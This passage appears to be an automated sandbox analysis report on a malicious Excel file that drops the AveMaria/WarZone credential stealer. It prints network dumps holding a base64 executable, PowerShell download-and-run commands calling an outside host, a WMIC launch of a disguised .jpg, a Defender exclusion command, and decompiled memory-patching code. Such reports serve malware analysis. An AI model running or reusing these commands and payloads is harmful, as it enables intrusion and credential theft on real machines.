41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: SET-EXeCUtIonPoliCy BypASs -sCope PRoCESs -FOrCE ; $kaECCflhAnVV = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA3YsTacwOqiXMDqolzA6qJ8B+kiXIDqolFJaeJcgOqiTwho4l2A6qJcwOqiXEDqolSaWNocwOqiQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUA7N/1XwAAAAAAAAAA4AAOAQsBBgAA8AMAAGAAAAAAAAAcEgAAABAAAAAABAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAHAEAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAATAMEAFAAAAAAMAQAaCwAAAAAAAAAAAAAAAAAAAAAAAAAYAQA/AgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAB0AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAU7gMAABAAAADwAwAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA/AkAAAAABAAAEAAAAAAEAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAEgVAAAAEAQAABAAAAAQBAAAAAAAAAAAAAAAAABAAADALnJzcmMAAABoLAAAADAEAAAwAAAAIAQAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAA+gsAAABgBAAAEAAAAFAEAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2021 09:34:53.435076952 CET	113	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2021 09:34:53.435107946 CET	114	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2021 09:34:53.435142994 CET	115	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2021 09:34:53.435174942 CET	117	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2021 09:34:53.435205936 CET	118	IN	Data Raw: 51 41 41 41 41 41 41 4e 42 73 68 51 55 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 30 45 6b 41 41 41 51 41 45 41 4e 41 69 51 41 41 41 41 41 41 41 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 38 41 41 41 41 41 35 43 4e 41 41 50 77 52 52 41 41 41 41 41 41 41 Data Ascii: QAAAAAANBshQUAAAAAAAAAAAAAAAC0EkAAAQAEANAiQAAAAAAA//////////8AAAAA5CNAAPwRRAAAAAAAAO9sBgAAAAAAAAAAAAAAAOwSQAABAAAA0CJAAAAAAAD//////////wAAAAAkI0AAyBFEAAAAAADAgHAGAAAAAAAAAAAAAAAAJBNAAAEAAQDQIkAAAAAAAP//////////AAAAAFQjQADsEUQAAAAAAFCjdAYBACAAA
Jan 8, 2021 09:34:53.435256958 CET	119	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0EkAAAQAAAAEABQDQIkAAAAAAAEBGQgD/////AAAAABQkQABgEkQAAAAAAIgUbAYAAAAAAAAAAAAAAABoF0AAAQAAAPQwQAAAAAAAaBdAAAEAAAB
Jan 8, 2021 09:34:53.435280085 CET	121	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4f 42 68 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOBhAAPAWQAAEEkAAChJAABASQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBbCQE//8AAOmbWAIAgWwkBP//AADpnlkCAIFsJARDA
Jan 8, 2021 09:34:53.435300112 CET	122	IN	Data Raw: 45 6b 41 41 45 42 4a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: EkAAEBJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEHEAAZBtAAAQSQAAKEkAAEBJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2021 09:34:53.435323000 CET	124	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 77 64 51 41 42 6b 47 30 41 41 42 42 4a 41 41 41 6f 53 51 41 41 51 45 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAEwdQABkG0AABBJAAAoSQAAQEkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhBJEAIBGQgD/////AAAAAHQSRAAhm4f3L+GHTIYrsucVaf1TCgAGAAYAB
Jan 8, 2021 09:34:53.618185997 CET	125	IN	Data Raw: 62 77 41 71 41 47 34 41 4b 67 42 30 41 43 6f 41 63 67 41 71 41 47 38 41 4b 67 42 73 41 43 6f 41 55 77 41 71 41 47 55 41 4b 67 42 30 41 43 6f 41 4d 41 41 71 41 44 41 41 4b 67 41 78 41 43 6f 41 58 41 41 71 41 46 4d 41 4b 67 42 6c 41 43 6f 41 63 67 Data Ascii: bwAqAG4AKgB0ACoAcgAqAG8AKgBsACoAUwAqAGUAKgB0ACoAMAAqADAAKgAxACoAXAAqAFMAKgBlACoAcgAqAHYAKgBpACoAYwAqAGUAKgBzACoAXAAqAEQAKgBpACoAcwAqAGsAKgBcACoARQAqAG4AKgB1ACoAbQAqAAAAAAACAAAAMAAAACQAAAAqACsAVgArAEkAKwBSACsAVAArAFUAKwBBACsATAArACoAKwAAAAAAIAA

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6472 Parent PID: 800

General

Start time:	09:34:20
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0xb0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1836 Parent PID: 6472

General

Start time:	09:34:25
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5900 Parent PID: 1836

General

Start time:	09:34:26
Start date:	08/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 5848 Parent PID: 1836

General

Start time:	09:34:26
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
Imagebase:	0x880000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000003.759722473.00000000061E3000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000003.739726186.000000000071D000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 6108 Parent PID: 5848

General

Start time:	09:34:58
Start date:	08/01/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
Imagebase:	0x12e0000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 6504 Parent PID: 6108

General

Start time:	09:34:59
Start date:	08/01/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
Imagebase:	0xa40000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7036 Parent PID: 5848

General

Start time:	09:35:04
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6924 Parent PID: 5848

General

Start time:	09:35:05
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WMIC.exe PID: 6992 Parent PID: 6924

General

Start time:	09:35:06
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
Imagebase:	0xd90000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: Test3.jpg PID: 6852 Parent PID: 5060

General

Start time:	09:35:07
Start date:	08/01/2021
Path:	C:\Users\user\AppData\Local\Temp\Test3.jpg
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Test3.jpg
Imagebase:	0x400000
File size:	339293 bytes
MD5 hash:	DD27F33FCD6F1FA4C67EE05D836795C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000000.764732381.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.783515823.0000000002C2F000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: Test3.jpg PID: 5940 Parent PID: 6852

General

Start time:	09:35:14
Start date:	08/01/2021
Path:	C:\Users\user\AppData\Local\Temp\Test3.jpg
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Test3.jpg
Imagebase:	0x400000
File size:	339293 bytes
MD5 hash:	DD27F33FCD6F1FA4C67EE05D836795C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.946480583.0000000003465000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000000.780781628.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785553106.000000000062C000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.946136847.0000000002B8F000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.939727802.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785647201.000000000062C000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000001.781400247.000000000054F000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 5368 Parent PID: 5940

General

Start time:	09:35:17
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell Add-MpPreference -ExclusionPath C:\
Imagebase:	0x880000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5384 Parent PID: 5940

General

Start time:	09:35:17
Start date:	08/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5468 Parent PID: 5368

General

Start time:	09:35:17
Start date:	08/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5460 Parent PID: 5384

General

Start time:	09:35:18
Start date:	08/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rdpvideominiport.sys PID: 4 Parent PID: -1

General

Start time:	09:35:32
Start date:	08/01/2021
Path:	C:\Windows\System32\drivers\rdpvideominiport.sys
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff732050000
File size:	30616 bytes
MD5 hash:	0600DF60EF88FD10663EC84709E5E245
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rdpdr.sys PID: 4 Parent PID: -1

General

Start time:	09:35:34
Start date:	08/01/2021
Path:	C:\Windows\System32\drivers\rdpdr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	182784 bytes
MD5 hash:	52A6CC99F5934CFAE88353C47B6193E7
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: tsusbhub.sys PID: 4 Parent PID: -1

General

Start time:	09:35:35
Start date:	08/01/2021
Path:	C:\Windows\system32\drivers\tsusbhub.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	126464 bytes
MD5 hash:	3A84A09CBC42148A0C7D00B3E82517F1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Test3.jpg PID: 6852 Parent PID: 5060 Test3.jpgCOMMON

Executed Functions

Function 00424D1A, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
nativememoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00424D1A(void* __eflags) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				void* _t45;
				void* _t54;
				void* _t55;
				long _t57;
				long _t66;
				void* _t68;
				long _t81;
				void* _t82;
				int _t84;
				intOrPtr _t86;
				intOrPtr* _t95;
				void* _t98;
				void* _t102;
				void* _t104;
				void* _t105;

				_v20 = 0x100;
				_v12 = 5;
				E0042500D(_t45, 0x424a46);
				_t103 = E004252D0("SysAllocStringByteLen");
				E0042502F(_t102, 0x4249a4);
				_v40 = E00425271(_t47, "SysAllocStringByteLen");
				E0042502F(_t50, 0x4249d5);
				_v32 = E00425271(_t47, "SysAllocStringByteLen");
				E0042502F(_t52, 0x4249bb);
				_t54 = E00425271(_t103, "SysAllocStringByteLen");
				_v36 = _t54;
				_v16 = _t54;
				if( *0x4410b0 == 0) {
					_t81 = NtAllocateVirtualMemory(0xffffffff, 0x4410b0, 0,  &_v20, 0x3000, 0x40);
					if(_t81 >= 0) {
						goto L3;
					} else {
						return _t81;
					}
				}
				L3:
				_t55 =  *0x4410b0; // 0x620000
				_v28 = _t55 +  *0x4410b4;
				_t57 = NtProtectVirtualMemory(0xffffffff,  &_v16,  &_v12, 0x40,  &_v8);
				if(_t57 < 0) {
					return _t57;
				}
				_t82 = 0;
				_t98 = _v28;
				_t104 = _v36;
				while(_t82 < 5) {
					_push( &_v24);
					_push(_t104);
					_t84 = E00424852();
					_t68 = memcpy(_t98, _t104, _t84);
					_t105 = _t105 + 0xc;
					_t98 = _t104 + _t84 + _t84;
					_t82 = _t82 + _t68;
					_t95 = _v24;
					_t86 =  *_t95;
					if(_t86 == 0xe9 || _t86 == 0xe8) {
						 *((intOrPtr*)(_t98 - 4)) =  *((intOrPtr*)(_t95 + 1)) + _t104 - _t98;
					} else {
						if(_t86 != 0xeb) {
							if(_t86 < 0x70 || _t86 > 0x7f) {
								if(_t86 == 0xf && _t86 >= 0x80 && _t86 <= 0x8f) {
									 *((intOrPtr*)(_t98 - 4)) =  *((intOrPtr*)(_t95 + 2)) + _t104 - _t98;
								}
							} else {
								 *((char*)(_t98 - 2)) = 0xf;
								 *((char*)(_t98 - 1)) = _t86 + 0x10;
								asm("stosd");
							}
						} else {
							 *((char*)(_t98 - 2)) = 0xe9;
